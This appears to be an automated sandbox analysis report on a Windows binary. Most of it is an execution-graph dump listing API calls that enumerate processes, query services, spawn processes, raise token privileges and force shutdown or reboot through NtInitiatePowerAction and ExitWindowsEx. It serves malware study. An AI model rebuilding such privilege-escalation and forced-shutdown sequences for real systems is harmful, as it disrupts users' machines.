                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Disassembly

                          Reset < >

                            Execution Graph

                            Execution Coverage:2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.1%
                            Total number of Nodes:741
                            Total number of Limit Nodes:9
                            execution_graph 63618 6c1101c3 63619 6c1101ed 63618->63619 63620 6c1101d5 __dosmaperr 63618->63620 63619->63620 63622 6c110238 __dosmaperr 63619->63622 63623 6c110267 63619->63623 63665 6c103810 18 API calls __cftoe 63622->63665 63624 6c110280 63623->63624 63625 6c11029b __dosmaperr 63623->63625 63628 6c1102d7 __wsopen_s 63623->63628 63624->63625 63627 6c110285 63624->63627 63658 6c103810 18 API calls __cftoe 63625->63658 63653 6c1150d5 63627->63653 63659 6c107eab HeapFree GetLastError _free 63628->63659 63629 6c11042e 63633 6c1104a4 63629->63633 63636 6c110447 GetConsoleMode 63629->63636 63631 6c1102f7 63660 6c107eab HeapFree GetLastError _free 63631->63660 63635 6c1104a8 ReadFile 63633->63635 63638 6c1104c2 63635->63638 63639 6c11051c GetLastError 63635->63639 63636->63633 63640 6c110458 63636->63640 63637 6c1102fe 63651 6c1102b2 __dosmaperr __wsopen_s 63637->63651 63661 6c10e359 20 API calls __wsopen_s 63637->63661 63638->63639 63641 6c110499 63638->63641 63639->63651 63640->63635 63642 6c11045e ReadConsoleW 63640->63642 63646 6c1104e7 63641->63646 63647 6c1104fe 63641->63647 63641->63651 63642->63641 63645 6c11047a GetLastError 63642->63645 63645->63651 63663 6c1105ee 23 API calls 3 library calls 63646->63663 63648 6c110515 63647->63648 63647->63651 63664 6c1108a6 21 API calls __wsopen_s 63648->63664 63662 6c107eab HeapFree GetLastError _free 63651->63662 63652 6c11051a 63652->63651 63655 6c1150ef 63653->63655 63656 6c1150e2 63653->63656 63654 6c1150fb 63654->63629 63655->63654 63666 6c103810 18 API calls __cftoe 63655->63666 63656->63629 63658->63651 63659->63631 63660->63637 63661->63627 63662->63620 63663->63651 63664->63652 63665->63620 63666->63656 63667 6bf74b53 63825 6c0fa133 63667->63825 63669 6bf74b5c _Yarn 63839 6c0ee090 63669->63839 63671 6bf9639e 63932 6c103820 18 API calls 2 library calls 63671->63932 63673 6bf74cff 63674 6bf75164 CreateFileA CloseHandle 63679 6bf751ec 63674->63679 63675 6bf74bae std::ios_base::_Ios_base_dtor 63675->63671 63675->63673 63675->63674 63676 6bf8245a _Yarn _strlen 63675->63676 63676->63671 63678 6c0ee090 2 API calls 63676->63678 63694 6bf82a83 std::ios_base::_Ios_base_dtor 63678->63694 63845 6c0f8810 OpenSCManagerA 63679->63845 63681 6bf7fc00 63924 6c0f8930 CreateToolhelp32Snapshot 63681->63924 63683 6c0fa133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63720 6bf75478 std::ios_base::_Ios_base_dtor _Yarn _strlen 63683->63720 63686 6c0ee090 2 API calls 63686->63720 63687 6bf837d0 Sleep 63731 6bf837e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 63687->63731 63688 6bf963b2 63933 6bf715e0 18 API calls std::ios_base::_Ios_base_dtor 63688->63933 63689 6c0f8930 4 API calls 63707 6bf8053a 63689->63707 63690 6c0f8930 4 API calls 63713 6bf812e2 63690->63713 63692 6bf7ffe3 63692->63689 63699 6bf80abc 63692->63699 63693 6bf964f8 63694->63671 63849 6c0e0880 63694->63849 63695 6bf96ba0 104 API calls 63695->63720 63696 6bf96e60 32 API calls 63696->63720 63698 6c0f8930 4 API calls 63698->63699 63699->63676 63699->63690 63701 6c0f8930 4 API calls 63721 6bf81dd9 63701->63721 63702 6bf8211c 63702->63676 63703 6bf8241a 63702->63703 63706 6c0e0880 10 API calls 63703->63706 63704 6c0ee090 2 API calls 63704->63731 63709 6bf8244d 63706->63709 63707->63698 63707->63699 63708 6bf76722 63900 6c0f4860 25 API calls 4 library calls 63708->63900 63930 6c0f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63709->63930 63711 6bf82452 Sleep 63711->63676 63712 6bf816ac 63713->63701 63713->63702 63713->63712 63714 6bf76162 63715 6bf7740b 63901 6c0f86e0 CreateProcessA 63715->63901 63717 6c0f8930 4 API calls 63717->63702 63720->63671 63720->63681 63720->63683 63720->63686 63720->63695 63720->63696 63720->63708 63720->63714 63886 6bf97090 63720->63886 63899 6bfbe010 67 API calls 63720->63899 63721->63702 63721->63717 63722 6bf97090 77 API calls 63722->63731 63724 6bf7775a _strlen 63724->63671 63725 6bf77b92 63724->63725 63726 6bf77ba9 63724->63726 63729 6bf77b43 _Yarn 63724->63729 63727 6c0fa133 std::_Facet_Register 4 API calls 63725->63727 63728 6c0fa133 std::_Facet_Register 4 API calls 63726->63728 63727->63729 63728->63729 63730 6c0ee090 2 API calls 63729->63730 63740 6bf77be7 std::ios_base::_Ios_base_dtor 63730->63740 63731->63671 63731->63704 63731->63722 63857 6bf96ba0 63731->63857 63876 6bf96e60 63731->63876 63931 6bfbe010 67 API calls 63731->63931 63732 6c0f86e0 4 API calls 63743 6bf78a07 63732->63743 63733 6bf79d7f 63737 6c0fa133 std::_Facet_Register 4 API calls 63733->63737 63734 6bf79d68 63736 6c0fa133 std::_Facet_Register 4 API calls 63734->63736 63735 6bf7962c _strlen 63735->63671 63735->63733 63735->63734 63738 6bf79d18 _Yarn 63735->63738 63736->63738 63737->63738 63739 6c0ee090 2 API calls 63738->63739 63746 6bf79dbd std::ios_base::_Ios_base_dtor 63739->63746 63740->63671 63740->63732 63740->63735 63741 6bf78387 63740->63741 63742 6c0f86e0 4 API calls 63751 6bf79120 63742->63751 63743->63742 63744 6c0f86e0 4 API calls 63761 6bf7a215 _strlen 63744->63761 63745 6c0f86e0 4 API calls 63747 6bf79624 63745->63747 63746->63671 63746->63744 63754 6bf7e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 63746->63754 63905 6c0f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63747->63905 63748 6c0fa133 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63748->63754 63750 6c0ee090 2 API calls 63750->63754 63751->63745 63752 6bf7ed02 Sleep 63773 6bf7e8c1 63752->63773 63753 6bf7f7b1 63923 6c0f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63753->63923 63754->63671 63754->63748 63754->63750 63754->63752 63754->63753 63756 6bf7e8dd GetCurrentProcess TerminateProcess 63756->63754 63757 6bf7a9a4 63759 6c0fa133 std::_Facet_Register 4 API calls 63757->63759 63758 6bf7a9bb 63760 6c0fa133 std::_Facet_Register 4 API calls 63758->63760 63768 6bf7a953 _Yarn _strlen 63759->63768 63760->63768 63761->63671 63761->63757 63761->63758 63761->63768 63762 6c0f86e0 4 API calls 63762->63773 63763 6bf7fbb8 63765 6bf7fbe8 ExitWindowsEx Sleep 63763->63765 63764 6bf7f7c0 63764->63763 63765->63681 63766 6bf7aff0 63769 6c0fa133 std::_Facet_Register 4 API calls 63766->63769 63767 6bf7b009 63770 6c0fa133 std::_Facet_Register 4 API calls 63767->63770 63768->63688 63768->63766 63768->63767 63771 6bf7afa0 _Yarn 63768->63771 63769->63771 63770->63771 63906 6c0f9050 63771->63906 63773->63754 63773->63756 63773->63762 63774 6bf7b059 std::ios_base::_Ios_base_dtor _strlen 63774->63671 63775 6bf7b443 63774->63775 63776 6bf7b42c 63774->63776 63779 6bf7b3da _Yarn _strlen 63774->63779 63778 6c0fa133 std::_Facet_Register 4 API calls 63775->63778 63777 6c0fa133 std::_Facet_Register 4 API calls 63776->63777 63777->63779 63778->63779 63779->63688 63780 6bf7b7b7 63779->63780 63781 6bf7b79e 63779->63781 63784 6bf7b751 _Yarn 63779->63784 63782 6c0fa133 std::_Facet_Register 4 API calls 63780->63782 63783 6c0fa133 std::_Facet_Register 4 API calls 63781->63783 63782->63784 63783->63784 63785 6c0f9050 104 API calls 63784->63785 63786 6bf7b804 std::ios_base::_Ios_base_dtor _strlen 63785->63786 63786->63671 63787 6bf7bc26 63786->63787 63788 6bf7bc0f 63786->63788 63791 6bf7bbbd _Yarn _strlen 63786->63791 63790 6c0fa133 std::_Facet_Register 4 API calls 63787->63790 63789 6c0fa133 std::_Facet_Register 4 API calls 63788->63789 63789->63791 63790->63791 63791->63688 63792 6bf7c075 63791->63792 63793 6bf7c08e 63791->63793 63796 6bf7c028 _Yarn 63791->63796 63794 6c0fa133 std::_Facet_Register 4 API calls 63792->63794 63795 6c0fa133 std::_Facet_Register 4 API calls 63793->63795 63794->63796 63795->63796 63797 6c0f9050 104 API calls 63796->63797 63802 6bf7c0db std::ios_base::_Ios_base_dtor _strlen 63797->63802 63798 6bf7c7a5 63800 6c0fa133 std::_Facet_Register 4 API calls 63798->63800 63799 6bf7c7bc 63801 6c0fa133 std::_Facet_Register 4 API calls 63799->63801 63809 6bf7c753 _Yarn _strlen 63800->63809 63801->63809 63802->63671 63802->63798 63802->63799 63802->63809 63803 6bf7d406 63806 6c0fa133 std::_Facet_Register 4 API calls 63803->63806 63804 6bf7d3ed 63805 6c0fa133 std::_Facet_Register 4 API calls 63804->63805 63807 6bf7d39a _Yarn 63805->63807 63806->63807 63808 6c0f9050 104 API calls 63807->63808 63810 6bf7d458 std::ios_base::_Ios_base_dtor _strlen 63808->63810 63809->63688 63809->63803 63809->63804 63809->63807 63815 6bf7cb2f 63809->63815 63810->63671 63811 6bf7d8a4 63810->63811 63812 6bf7d8bb 63810->63812 63816 6bf7d852 _Yarn _strlen 63810->63816 63813 6c0fa133 std::_Facet_Register 4 API calls 63811->63813 63814 6c0fa133 std::_Facet_Register 4 API calls 63812->63814 63813->63816 63814->63816 63816->63688 63817 6bf7dcb6 63816->63817 63818 6bf7dccf 63816->63818 63821 6bf7dc69 _Yarn 63816->63821 63819 6c0fa133 std::_Facet_Register 4 API calls 63817->63819 63820 6c0fa133 std::_Facet_Register 4 API calls 63818->63820 63819->63821 63820->63821 63822 6c0f9050 104 API calls 63821->63822 63824 6bf7dd1c std::ios_base::_Ios_base_dtor 63822->63824 63823 6c0f86e0 4 API calls 63823->63754 63824->63671 63824->63823 63826 6c0fa138 63825->63826 63827 6c0fa152 63826->63827 63830 6c0fa154 std::_Facet_Register 63826->63830 63934 6c102704 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63826->63934 63827->63669 63829 6c0fafb3 std::_Facet_Register 63938 6c0fca69 RaiseException 63829->63938 63830->63829 63935 6c0fca69 RaiseException 63830->63935 63832 6c0fb7ac IsProcessorFeaturePresent 63838 6c0fb7d1 63832->63838 63834 6c0faf73 63936 6c0fca69 RaiseException 63834->63936 63836 6c0faf93 std::invalid_argument::invalid_argument 63937 6c0fca69 RaiseException 63836->63937 63838->63669 63840 6c0ee0a6 FindFirstFileA 63839->63840 63841 6c0ee0a4 63839->63841 63842 6c0ee0e0 63840->63842 63841->63840 63843 6c0ee13c 63842->63843 63844 6c0ee0e2 FindClose 63842->63844 63843->63675 63844->63842 63846 6c0f8846 63845->63846 63847 6c0f88be OpenServiceA 63846->63847 63848 6c0f8922 63846->63848 63847->63846 63848->63720 63854 6c0e0893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63849->63854 63850 6c0e4e71 CloseHandle 63850->63854 63851 6bf837cb 63856 6c0f9450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63851->63856 63852 6c0e3bd1 CloseHandle 63852->63854 63854->63850 63854->63851 63854->63852 63855 6c0ccea0 WriteFile ReadFile WriteFile WriteFile 63854->63855 63939 6c0cc390 63854->63939 63855->63854 63856->63687 63858 6bf96bd5 63857->63858 63950 6bfc2020 63858->63950 63860 6bf96c68 63861 6c0fa133 std::_Facet_Register 4 API calls 63860->63861 63862 6bf96ca0 63861->63862 63967 6c0faa17 63862->63967 63864 6bf96cb4 63979 6bfc1d90 63864->63979 63867 6bf96d8e 63867->63731 63869 6bf96dc8 63987 6bfc26e0 24 API calls 4 library calls 63869->63987 63871 6bf96dda 63988 6c0fca69 RaiseException 63871->63988 63873 6bf96def 63989 6bfbe010 67 API calls 63873->63989 63875 6bf96e0f 63875->63731 63877 6bf96e9f 63876->63877 63880 6bf96eb3 63877->63880 64379 6bfc3560 32 API calls std::_Xinvalid_argument 63877->64379 63883 6bf96f5b 63880->63883 64381 6bfc2250 30 API calls 63880->64381 64382 6bfc26e0 24 API calls 4 library calls 63880->64382 64383 6c0fca69 RaiseException 63880->64383 63882 6bf96f6e 63882->63731 63883->63882 64380 6bfc37e0 32 API calls std::_Xinvalid_argument 63883->64380 63887 6bf9709e 63886->63887 63890 6bf970d1 63886->63890 64384 6bfc01f0 63887->64384 63888 6bf97183 63888->63720 63890->63888 64388 6bfc2250 30 API calls 63890->64388 63893 6c104208 67 API calls 63893->63890 63894 6bf971ae 64389 6bfc2340 24 API calls 63894->64389 63896 6bf971be 64390 6c0fca69 RaiseException 63896->64390 63898 6bf971c9 63899->63720 63900->63715 63902 6c0f8770 63901->63902 63903 6c0f87b0 WaitForSingleObject CloseHandle CloseHandle 63902->63903 63904 6c0f87a4 63902->63904 63903->63902 63904->63724 63905->63735 63907 6c0f90a7 63906->63907 64436 6c0f96e0 63907->64436 63909 6c0f90b8 63910 6bf96ba0 104 API calls 63909->63910 63914 6c0f90dc 63910->63914 63912 6c0f918f std::ios_base::_Ios_base_dtor 64489 6bfbe010 67 API calls 63912->64489 63916 6c0f9144 63914->63916 63922 6c0f9157 63914->63922 64455 6c0f9a30 63914->64455 64463 6bfd3010 63914->64463 64473 6c0f9280 63916->64473 63919 6c0f91d2 std::ios_base::_Ios_base_dtor 63919->63774 63920 6c0f914c 63921 6bf97090 77 API calls 63920->63921 63921->63922 64488 6bfbe010 67 API calls 63922->64488 63923->63764 63928 6c0f8966 std::locale::_Setgloballocale 63924->63928 63925 6c0f8a64 Process32NextW 63925->63928 63926 6c0f8a14 CloseHandle 63926->63928 63927 6c0f8a96 63927->63692 63928->63925 63928->63926 63928->63927 63929 6c0f8a45 Process32FirstW 63928->63929 63929->63928 63930->63711 63931->63731 63933->63693 63934->63826 63935->63834 63936->63836 63937->63829 63938->63832 63940 6c0cc3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 63939->63940 63941 6c0cce3c 63940->63941 63943 6c0ccab9 CreateFileA 63940->63943 63944 6c0cb4d0 63940->63944 63941->63854 63943->63940 63945 6c0cb4e3 __wsopen_s std::locale::_Setgloballocale 63944->63945 63946 6c0cc206 WriteFile 63945->63946 63947 6c0cc377 63945->63947 63948 6c0cb619 WriteFile 63945->63948 63949 6c0cbc23 ReadFile 63945->63949 63946->63945 63947->63940 63948->63945 63949->63945 63951 6c0fa133 std::_Facet_Register 4 API calls 63950->63951 63952 6bfc207e 63951->63952 63953 6c0faa17 43 API calls 63952->63953 63954 6bfc2092 63953->63954 63990 6bfc2f60 42 API calls 4 library calls 63954->63990 63956 6bfc210d 63961 6bfc2120 63956->63961 63991 6c0fa67e 9 API calls 2 library calls 63956->63991 63957 6bfc20c8 63957->63956 63958 6bfc2136 63957->63958 63992 6bfc2250 30 API calls 63958->63992 63961->63860 63962 6bfc215b 63993 6bfc2340 24 API calls 63962->63993 63964 6bfc2171 63994 6c0fca69 RaiseException 63964->63994 63966 6bfc217c 63966->63860 63968 6c0faa23 __EH_prolog3 63967->63968 63995 6c0fa5a5 63968->63995 63973 6c0faa41 64009 6c0faaaa 39 API calls std::locale::_Setgloballocale 63973->64009 63974 6c0faa9c 63974->63864 63976 6c0faa49 64010 6c0fa8a1 HeapFree GetLastError _Yarn 63976->64010 63978 6c0faa5f 64001 6c0fa5d6 63978->64001 63980 6bfc1ddc 63979->63980 63981 6bf96d5d 63979->63981 64015 6c0fab37 63980->64015 63981->63867 63986 6bfc2250 30 API calls 63981->63986 63985 6bfc1e82 63986->63869 63987->63871 63988->63873 63989->63875 63990->63957 63991->63961 63992->63962 63993->63964 63994->63966 63996 6c0fa5bb 63995->63996 63997 6c0fa5b4 63995->63997 63999 6c0fa5b9 63996->63999 64012 6c0fbc7b EnterCriticalSection 63996->64012 64011 6c103abd 6 API calls std::_Lockit::_Lockit 63997->64011 63999->63978 64008 6c0fa920 6 API calls 2 library calls 63999->64008 64002 6c103acb 64001->64002 64003 6c0fa5e0 64001->64003 64014 6c103aa6 LeaveCriticalSection 64002->64014 64004 6c0fa5f3 64003->64004 64013 6c0fbc89 LeaveCriticalSection 64003->64013 64004->63974 64007 6c103ad2 64007->63974 64008->63973 64009->63976 64010->63978 64011->63999 64012->63999 64013->64004 64014->64007 64016 6c0fab40 64015->64016 64017 6bfc1dea 64016->64017 64024 6c10343a 64016->64024 64017->63981 64023 6c0ffc53 18 API calls __cftoe 64017->64023 64019 6c0fab8c 64019->64017 64035 6c103148 65 API calls 64019->64035 64021 6c0faba7 64021->64017 64036 6c104208 64021->64036 64023->63985 64026 6c103445 __wsopen_s 64024->64026 64025 6c103458 64061 6c103810 18 API calls __cftoe 64025->64061 64026->64025 64027 6c103478 64026->64027 64031 6c103468 64027->64031 64047 6c10e4fc 64027->64047 64031->64019 64035->64021 64037 6c104214 __wsopen_s 64036->64037 64038 6c104233 64037->64038 64039 6c10421e 64037->64039 64040 6c10422e 64038->64040 64242 6c0ffc99 EnterCriticalSection 64038->64242 64257 6c103810 18 API calls __cftoe 64039->64257 64040->64017 64042 6c104250 64243 6c10428c 64042->64243 64045 6c10425b 64258 6c104282 LeaveCriticalSection 64045->64258 64048 6c10e508 __wsopen_s 64047->64048 64063 6c103a8f EnterCriticalSection 64048->64063 64050 6c10e516 64064 6c10e5a0 64050->64064 64055 6c10e662 64056 6c10e781 64055->64056 64088 6c10e804 64056->64088 64059 6c1034bc 64062 6c1034e5 LeaveCriticalSection 64059->64062 64061->64031 64062->64031 64063->64050 64073 6c10e5c3 64064->64073 64065 6c10e523 64078 6c10e55c 64065->64078 64066 6c10e61b 64083 6c10a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 64066->64083 64068 6c10e624 64084 6c107eab HeapFree GetLastError _free 64068->64084 64071 6c10e62d 64071->64065 64085 6c10a30f 6 API calls std::_Lockit::_Lockit 64071->64085 64073->64065 64073->64066 64081 6c0ffc99 EnterCriticalSection 64073->64081 64082 6c0ffcad LeaveCriticalSection 64073->64082 64074 6c10e64c 64086 6c0ffc99 EnterCriticalSection 64074->64086 64077 6c10e65f 64077->64065 64087 6c103aa6 LeaveCriticalSection 64078->64087 64080 6c103493 64080->64031 64080->64055 64081->64073 64082->64073 64083->64068 64084->64071 64085->64074 64086->64077 64087->64080 64090 6c10e823 64088->64090 64089 6c10e84b 64099 6c10e96b 64089->64099 64105 6c117598 37 API calls __cftoe 64089->64105 64090->64089 64091 6c10e836 64090->64091 64104 6c103810 18 API calls __cftoe 64091->64104 64093 6c10e797 64093->64059 64101 6c1176ce 64093->64101 64096 6c10e9bb 64096->64099 64106 6c117598 37 API calls __cftoe 64096->64106 64098 6c10e9d9 64098->64099 64107 6c117598 37 API calls __cftoe 64098->64107 64099->64093 64108 6c103810 18 API calls __cftoe 64099->64108 64109 6c117a86 64101->64109 64104->64093 64105->64096 64106->64098 64107->64099 64108->64093 64111 6c117a92 __wsopen_s 64109->64111 64110 6c117a99 64127 6c103810 18 API calls __cftoe 64110->64127 64111->64110 64112 6c117ac4 64111->64112 64118 6c1176ee 64112->64118 64117 6c1176e9 64117->64059 64129 6c103dbb 64118->64129 64123 6c117724 64125 6c117756 64123->64125 64169 6c107eab HeapFree GetLastError _free 64123->64169 64128 6c117b1b LeaveCriticalSection __wsopen_s 64125->64128 64127->64117 64128->64117 64170 6c0ff3db 64129->64170 64133 6c103ddf 64134 6c0ff4e6 64133->64134 64179 6c0ff53e 64134->64179 64136 6c0ff4fe 64136->64123 64137 6c11775c 64136->64137 64194 6c117bdc 64137->64194 64143 6c11778e __dosmaperr 64143->64123 64144 6c117882 GetFileType 64146 6c1178d4 64144->64146 64147 6c11788d GetLastError 64144->64147 64145 6c117857 GetLastError 64145->64143 64224 6c114ea0 SetStdHandle __dosmaperr __wsopen_s 64146->64224 64223 6c1030e2 __dosmaperr _free 64147->64223 64148 6c117805 64148->64144 64148->64145 64222 6c117b47 CreateFileW 64148->64222 64150 6c11789b CloseHandle 64150->64143 64152 6c1178c4 64150->64152 64152->64143 64154 6c11784a 64154->64144 64154->64145 64155 6c1178f5 64156 6c117941 64155->64156 64225 6c117d56 70 API calls 2 library calls 64155->64225 64160 6c117948 64156->64160 64239 6c117e00 70 API calls 2 library calls 64156->64239 64159 6c117976 64159->64160 64161 6c117984 64159->64161 64226 6c10f015 64160->64226 64161->64143 64163 6c117a00 CloseHandle 64161->64163 64240 6c117b47 CreateFileW 64163->64240 64165 6c117a2b 64165->64152 64166 6c117a35 GetLastError 64165->64166 64167 6c117a41 __dosmaperr 64166->64167 64241 6c114e0f SetStdHandle __dosmaperr __wsopen_s 64167->64241 64169->64125 64171 6c0ff3fb 64170->64171 64177 6c0ff3f2 64170->64177 64172 6c1080a2 __Getctype 37 API calls 64171->64172 64171->64177 64173 6c0ff41b 64172->64173 64174 6c108618 __Getctype 37 API calls 64173->64174 64175 6c0ff431 64174->64175 64176 6c108645 __cftoe 37 API calls 64175->64176 64176->64177 64177->64133 64178 6c10a0c5 5 API calls std::_Lockit::_Lockit 64177->64178 64178->64133 64180 6c0ff54c 64179->64180 64181 6c0ff566 64179->64181 64182 6c0ff4cc __wsopen_s HeapFree GetLastError 64180->64182 64183 6c0ff58c 64181->64183 64185 6c0ff56d 64181->64185 64189 6c0ff556 __dosmaperr 64182->64189 64184 6c107f33 __fassign MultiByteToWideChar 64183->64184 64186 6c0ff59b 64184->64186 64187 6c0ff48d __wsopen_s HeapFree GetLastError 64185->64187 64185->64189 64188 6c0ff5a2 GetLastError 64186->64188 64190 6c0ff5c8 64186->64190 64191 6c0ff48d __wsopen_s HeapFree GetLastError 64186->64191 64187->64189 64188->64189 64189->64136 64190->64189 64192 6c107f33 __fassign MultiByteToWideChar 64190->64192 64191->64190 64193 6c0ff5df 64192->64193 64193->64188 64193->64189 64195 6c117c17 64194->64195 64197 6c117bfd 64194->64197 64196 6c117b6c __wsopen_s 18 API calls 64195->64196 64201 6c117c4f 64196->64201 64197->64195 64198 6c103810 __cftoe 18 API calls 64197->64198 64198->64195 64199 6c117c7e 64200 6c119001 __wsopen_s 18 API calls 64199->64200 64205 6c117779 64199->64205 64202 6c117ccc 64200->64202 64201->64199 64204 6c103810 __cftoe 18 API calls 64201->64204 64203 6c117d49 64202->64203 64202->64205 64206 6c10383d __Getctype 11 API calls 64203->64206 64204->64199 64205->64143 64208 6c114cfc 64205->64208 64207 6c117d55 64206->64207 64209 6c114d08 __wsopen_s 64208->64209 64210 6c103a8f std::_Lockit::_Lockit EnterCriticalSection 64209->64210 64213 6c114d0f 64210->64213 64211 6c114d56 64214 6c114e06 __wsopen_s LeaveCriticalSection 64211->64214 64212 6c114d34 64215 6c114f32 __wsopen_s 11 API calls 64212->64215 64213->64211 64213->64212 64218 6c114da3 EnterCriticalSection 64213->64218 64216 6c114d76 64214->64216 64217 6c114d39 64215->64217 64216->64143 64221 6c117b47 CreateFileW 64216->64221 64217->64211 64220 6c115080 __wsopen_s EnterCriticalSection 64217->64220 64218->64211 64219 6c114db0 LeaveCriticalSection 64218->64219 64219->64213 64220->64211 64221->64148 64222->64154 64223->64150 64224->64155 64225->64156 64227 6c114c92 __wsopen_s 18 API calls 64226->64227 64229 6c10f025 64227->64229 64228 6c10f02b 64230 6c114e0f __wsopen_s SetStdHandle 64228->64230 64229->64228 64231 6c10f05d 64229->64231 64233 6c114c92 __wsopen_s 18 API calls 64229->64233 64238 6c10f083 __dosmaperr 64230->64238 64231->64228 64232 6c114c92 __wsopen_s 18 API calls 64231->64232 64234 6c10f069 CloseHandle 64232->64234 64235 6c10f054 64233->64235 64234->64228 64236 6c10f075 GetLastError 64234->64236 64237 6c114c92 __wsopen_s 18 API calls 64235->64237 64236->64228 64237->64231 64238->64143 64239->64159 64240->64165 64241->64152 64242->64042 64244 6c104299 64243->64244 64245 6c1042ae 64243->64245 64281 6c103810 18 API calls __cftoe 64244->64281 64249 6c1042a9 64245->64249 64259 6c1043a9 64245->64259 64249->64045 64253 6c1042d1 64274 6c10ef88 64253->64274 64255 6c1042d7 64255->64249 64282 6c107eab HeapFree GetLastError _free 64255->64282 64257->64040 64258->64040 64260 6c1043c1 64259->64260 64261 6c1042c3 64259->64261 64260->64261 64262 6c10d350 18 API calls 64260->64262 64265 6c10be2e 64261->64265 64263 6c1043df 64262->64263 64283 6c10f25c 64263->64283 64266 6c10be45 64265->64266 64267 6c1042cb 64265->64267 64266->64267 64366 6c107eab HeapFree GetLastError _free 64266->64366 64269 6c10d350 64267->64269 64270 6c10d371 64269->64270 64271 6c10d35c 64269->64271 64270->64253 64367 6c103810 18 API calls __cftoe 64271->64367 64273 6c10d36c 64273->64253 64275 6c10efae 64274->64275 64279 6c10ef99 __dosmaperr 64274->64279 64276 6c10efd5 64275->64276 64278 6c10eff7 __dosmaperr 64275->64278 64368 6c10f0b1 64276->64368 64376 6c103810 18 API calls __cftoe 64278->64376 64279->64255 64281->64249 64282->64249 64284 6c10f268 __wsopen_s 64283->64284 64285 6c10f2ba 64284->64285 64287 6c10f323 __dosmaperr 64284->64287 64290 6c10f270 __dosmaperr 64284->64290 64294 6c115080 EnterCriticalSection 64285->64294 64324 6c103810 18 API calls __cftoe 64287->64324 64288 6c10f2c0 64292 6c10f2dc __dosmaperr 64288->64292 64295 6c10f34e 64288->64295 64290->64261 64323 6c10f31b LeaveCriticalSection __wsopen_s 64292->64323 64294->64288 64296 6c10f370 64295->64296 64322 6c10f38c __dosmaperr 64295->64322 64297 6c10f3c4 64296->64297 64299 6c10f374 __dosmaperr 64296->64299 64298 6c10f3d7 64297->64298 64333 6c10e359 20 API calls __wsopen_s 64297->64333 64325 6c10f530 64298->64325 64332 6c103810 18 API calls __cftoe 64299->64332 64304 6c10f42c 64306 6c10f440 64304->64306 64307 6c10f485 WriteFile 64304->64307 64305 6c10f3ed 64308 6c10f3f1 64305->64308 64309 6c10f416 64305->64309 64312 6c10f475 64306->64312 64313 6c10f44b 64306->64313 64310 6c10f4a9 GetLastError 64307->64310 64307->64322 64308->64322 64334 6c10f94b 6 API calls __wsopen_s 64308->64334 64335 6c10f5a1 43 API calls 5 library calls 64309->64335 64310->64322 64338 6c10f9b3 7 API calls 2 library calls 64312->64338 64314 6c10f450 64313->64314 64315 6c10f465 64313->64315 64318 6c10f455 64314->64318 64314->64322 64337 6c10fb77 8 API calls 3 library calls 64315->64337 64336 6c10fa8e 7 API calls 2 library calls 64318->64336 64320 6c10f463 64320->64322 64322->64292 64323->64290 64324->64290 64326 6c1150d5 __wsopen_s 18 API calls 64325->64326 64328 6c10f541 64326->64328 64327 6c10f3e8 64327->64304 64327->64305 64328->64327 64339 6c1080a2 GetLastError 64328->64339 64331 6c10f57e GetConsoleMode 64331->64327 64332->64322 64333->64298 64334->64322 64335->64322 64336->64320 64337->64320 64338->64320 64340 6c1080bf 64339->64340 64341 6c1080b9 64339->64341 64342 6c10a252 __Getctype 6 API calls 64340->64342 64345 6c1080c5 SetLastError 64340->64345 64343 6c10a213 __Getctype 6 API calls 64341->64343 64344 6c1080dd 64342->64344 64343->64340 64344->64345 64346 6c1080e1 64344->64346 64352 6c108153 64345->64352 64353 6c108159 64345->64353 64347 6c10a8d5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 64346->64347 64349 6c1080ed 64347->64349 64350 6c1080f5 64349->64350 64351 6c10810c 64349->64351 64356 6c10a252 __Getctype 6 API calls 64350->64356 64355 6c10a252 __Getctype 6 API calls 64351->64355 64352->64327 64352->64331 64354 6c1041b9 __Getctype 35 API calls 64353->64354 64357 6c10815e 64354->64357 64358 6c108118 64355->64358 64359 6c108103 64356->64359 64360 6c10811c 64358->64360 64361 6c10812d 64358->64361 64363 6c107eab _free HeapFree GetLastError 64359->64363 64362 6c10a252 __Getctype 6 API calls 64360->64362 64365 6c107eab _free HeapFree GetLastError 64361->64365 64362->64359 64364 6c108109 64363->64364 64364->64345 64365->64364 64366->64267 64367->64273 64369 6c10f0bd __wsopen_s 64368->64369 64377 6c115080 EnterCriticalSection 64369->64377 64371 6c10f0cb 64372 6c10f015 __wsopen_s 21 API calls 64371->64372 64373 6c10f0f8 64371->64373 64372->64373 64378 6c10f131 LeaveCriticalSection __wsopen_s 64373->64378 64375 6c10f11a 64375->64279 64376->64279 64377->64371 64378->64375 64379->63880 64380->63882 64381->63880 64382->63880 64383->63880 64385 6bfc022e 64384->64385 64386 6bf970c4 64385->64386 64391 6c104ecb 64385->64391 64386->63893 64388->63894 64389->63896 64390->63898 64392 6c104ef6 64391->64392 64393 6c104ed9 64391->64393 64392->64385 64393->64392 64394 6c104efa 64393->64394 64396 6c104ee6 64393->64396 64399 6c1050f2 64394->64399 64407 6c103810 18 API calls __cftoe 64396->64407 64400 6c1050fe __wsopen_s 64399->64400 64408 6c0ffc99 EnterCriticalSection 64400->64408 64402 6c10510c 64409 6c1050af 64402->64409 64406 6c104f2c 64406->64385 64407->64392 64408->64402 64417 6c10bc96 64409->64417 64415 6c1050e9 64416 6c105141 LeaveCriticalSection 64415->64416 64416->64406 64418 6c10d350 18 API calls 64417->64418 64419 6c10bca7 64418->64419 64420 6c1150d5 __wsopen_s 18 API calls 